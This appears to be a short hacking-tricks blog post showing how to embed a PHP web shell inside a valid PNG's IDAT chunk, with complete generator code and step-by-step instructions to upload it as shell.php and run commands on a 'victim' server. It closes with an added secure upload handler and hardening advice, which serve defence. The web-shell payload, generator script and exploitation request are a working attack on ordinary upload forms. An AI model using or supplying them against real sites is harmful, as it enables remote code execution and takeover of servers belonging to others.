Trick #12 - Valid png image which can execute as PHP file
An easy trick that can get you remote command or PHP code execution on the victim.
Sometimes web developers only check the MIME type of the uploaded file (image/*) but never check the extension.
First, try changing the MIME type in the HTTP header with Burp. That is the easy case. But what can you do if the MIME type is checked after the file has been uploaded, i.e. from the file's actual contents? There is a nice trick from https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
This code creates a PNG file with the PHP code `<?=$_GET[0]($_POST[1]);?>` inside it:
```php
<?php
// Byte values of the pixels; chosen so that, once GD deflates the image data,
// the compressed IDAT chunk contains the PHP payload <?=$_GET[0]($_POST[1]);?>
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0xe, 0x93, 0x1b, 0x23, 0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae, 0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc, 0x5a, 0x1, 0xdc, 0x5a, 0x1, 0xdc, 0xa3, 0x9f, 0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c, 0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d, 0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1, 0x66, 0x44, 0x50, 0x33);

// A 100x100 true-colour canvas; only the first row carries the payload pixels.
$img = imagecreatetruecolor(100, 100);

// Consume the byte array three at a time as one (r, g, b) pixel.
for ($y = 0; $y < sizeof($p); $y += 3) {
    $r = $p[$y];
    $g = $p[$y + 1];
    $b = $p[$y + 2];
    $color = imagecolorallocate($img, $r, $g, $b);
    // Pixel index = triple index; all written to row 0.
    imagesetpixel($img, round($y / 3), 0, $color);
}

// Emit the PNG to stdout; redirect to a file when run from the command line.
header('Content-Type: image/png');
imagepng($img);
```
After that, save the image as "shell.php" and try to upload it to the victim (you can also change the MIME type to image/* in the HTTP request). If the file is uploaded successfully, request it with a POST query: http://victim/upload/shell.php?0=exec (with POST data: 1=id)
But exec/system/etc. functions may be disabled, so try phpinfo() or something similar.
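The trick above works only because the server keeps the client-supplied name (`shell.php`) and the web server hands that file to the PHP interpreter. The following is an added example, not code from the original post or from the linked article: an upload handler that ignores the client's file name, extension and Content-Type, sniffs the real bytes, and stores the file under a random server-chosen name with an extension derived from the detected type. The function name, the allowlist and the `/var/www/uploads` directory are assumptions made for illustration.

```php
<?php
// Added example (not from the original post): an upload handler that does not
// trust the client-supplied file name, extension or Content-Type. The bytes are
// sniffed with finfo, the extension is assigned server-side from the detected
// type, and the file is stored under a random name. Names here are assumptions.

/** Detected MIME types we accept, mapped to the extension the server assigns. */
const ALLOWED_IMAGE_TYPES = [
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
    'image/gif'  => 'gif',
];

/**
 * Validate one entry of $_FILES and store it. Returns the stored file name.
 * Throws RuntimeException on any validation failure.
 */
function store_uploaded_image(array $file, string $destDir): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed or missing');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }

    // Never use $file['type']: it is the client-supplied Content-Type and can
    // be set to image/* by hand (e.g. in Burp). Sniff the real bytes instead.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $detected = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_IMAGE_TYPES[$detected])) {
        throw new RuntimeException("rejected content type: $detected");
    }

    // Second check: the header must parse as an image at all.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a parseable image');
    }

    // The client-supplied name ("shell.php") is discarded entirely. A valid PNG
    // that happens to contain PHP source is stored as <random>.png, which a
    // normally configured web server serves as data, never as a script.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$detected];
    $dest = rtrim($destDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644); // plain data file, not executable
    return $name;
}

// Usage (assumed form field "image" and assumed upload directory):
// try {
//     $stored = store_uploaded_image($_FILES['image'], '/var/www/uploads');
// } catch (RuntimeException $e) {
//     http_response_code(400);
// }
```

Two deployment points complete the picture: keep the upload directory outside the document root (or disable script execution for it in the web server configuration), and serve files back with `X-Content-Type-Options: nosniff` so browsers do not reinterpret image bytes as something else. Sniffing content alone is not enough, as the post shows, since the file is a perfectly valid PNG; the decisive control is that the stored name and extension are never chosen by the uploader.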
Published at 02 Feb'2014